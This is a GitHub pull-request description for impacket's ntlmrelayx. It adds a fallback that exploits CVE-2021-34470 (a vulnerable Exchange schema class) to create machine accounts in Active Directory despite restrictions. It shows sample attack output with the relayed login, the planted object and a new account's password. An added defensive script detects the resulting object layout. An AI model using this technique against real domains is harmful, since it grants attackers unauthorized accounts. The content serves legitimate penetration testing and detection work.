
[ntlmrelayx] LDAP attack: bypass computer creation restrictions with CVE-2021-34470

Open SAERXCIT opened this issue 2 years ago • 0 comments

Hi !

This PR completes the --add-computer ntlmrelayx attack to try to exploit CVE-2021-34470 to add a computer even if restrictions are in place (machine account quota, SeMachineAccountPrivilege).

More info in the accompanying blog post.

If creation of a machine account fails, ntlmrelayx will check if the vulnerable LDAP object exists within the schema, and if so create it under the relayed computer account, and then add the new computer under this object. The output will look like the following:

[*] Authenticating against ldaps://dc1.domain.local as domain.local\BORDEAUX$ SUCCEED 
[*] Assuming relayed user has privileges to escalate a user via ACL attack 
[*] Attempting to create computer in: CN=Computers,DC=DOMAIN,DC=LOCAL 
[-] Failed to add a new computer: {'result': 50, 'description': 'insufficientAccessRights', 'dn': '', 'message': '00000522: SecErr: DSID-0315381B, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'referrals': None, 'type': 'addResponse'}
[*] Fallback: attempting to exploit CVE-2021-34470 (vulnerable Exchange schema)
[*] Checking if `msExchStorageGroup` object exists within the schema and is vulnerable
[*] Object `msExchStorageGroup` exists and is vulnerable!
[*] Attempting to add new `msExchStorageGroup` object `LHHWRBAO` under `CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL`
[*] Added `msExchStorageGroup` object at `CN=LHHWRBAO,CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL`. DON'T FORGET TO CLEANUP
[*] Attempting to create computer in `CN=LHHWRBAO,CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL`
[*] Adding new computer with username: ALMONDMACHINE$ and password: ~N7x6hr*hl]_>*_ result: OK

Credits to James Forshaw for the research.

Cheers !

SAERXCIT, Mar 28 '22 12:03
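The fallback path in the PR output leaves a distinctive footprint in the directory: an msExchStorageGroup object sitting directly beneath a computer account, and a computer object whose parent is that msExchStorageGroup rather than a container or OU. The following script is an added detection example, not part of the PR or of impacket; it walks a constructed directory snapshot (DN to objectClass, with DNs modelled on the ones in the output above but not taken from any real domain) and flags both halves of that pattern. The snapshot format, the `EXPECTED_COMPUTER_PARENTS` set and the function names are assumptions of this example.

```python
"""
Added detection example: find the object layout the CVE-2021-34470 fallback
described in the PR would leave behind. Input is a constructed snapshot of
DN -> objectClass pairs (assumed format; not real audit data).
"""
from typing import Dict, List, Tuple

# Constructed snapshot. The DNs mirror the shape of the PR output but are
# sample values, not from a real environment.
SNAPSHOT: Dict[str, str] = {
    "CN=Computers,DC=DOMAIN,DC=LOCAL": "container",
    "OU=Workstations,DC=DOMAIN,DC=LOCAL": "organizationalUnit",
    "CN=WS01,CN=Computers,DC=DOMAIN,DC=LOCAL": "computer",
    "CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL": "computer",
    "CN=LHHWRBAO,CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL": "msExchStorageGroup",
    "CN=ALMONDMACHINE,CN=LHHWRBAO,CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL": "computer",
}

# Parent object classes under which a computer object is normally expected
# (assumption of this example; extend for your own directory layout).
EXPECTED_COMPUTER_PARENTS = {"container", "organizationalUnit", "domainDNS"}


def split_rdns(dn: str) -> List[str]:
    """Split a DN into its RDNs, honouring backslash-escaped commas."""
    rdns: List[str] = []
    cur: List[str] = []
    i = 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):
            cur.append(dn[i:i + 2])  # keep the escape pair intact
            i += 2
            continue
        if ch == ",":
            rdns.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    rdns.append("".join(cur))
    return rdns


def parent_dn(dn: str) -> str:
    """Return the DN of the object's parent (everything after the first RDN)."""
    return ",".join(split_rdns(dn)[1:])


def find_suspicious(snapshot: Dict[str, str]) -> List[Tuple[str, str]]:
    """
    Return (dn, reason) pairs for:
      * msExchStorageGroup objects whose parent is a computer account
      * computer objects whose parent class is not a normal computer container
    Both correspond to the object chain the PR output shows being created.
    """
    findings: List[Tuple[str, str]] = []
    for dn, obj_class in snapshot.items():
        parent = parent_dn(dn)
        parent_class = snapshot.get(parent)  # None if the parent is not in the snapshot
        if obj_class.lower() == "msexchstoragegroup" and parent_class == "computer":
            findings.append((dn, "msExchStorageGroup object under a computer account"))
        if obj_class == "computer" and parent_class not in EXPECTED_COMPUTER_PARENTS:
            findings.append((dn, f"computer object under unexpected parent class {parent_class!r}"))
    return findings


if __name__ == "__main__":
    for dn, reason in find_suspicious(SNAPSHOT):
        print(f"[!] {reason}: {dn}")
```

On a live directory the same logic applies to an LDAP export or to object-creation audit events: key each object by DN, resolve the parent's class, and alert on either condition. The PR's own output flags that the msExchStorageGroup object must be cleaned up, so a lingering object of that class under a computer account is worth a look even after the fact.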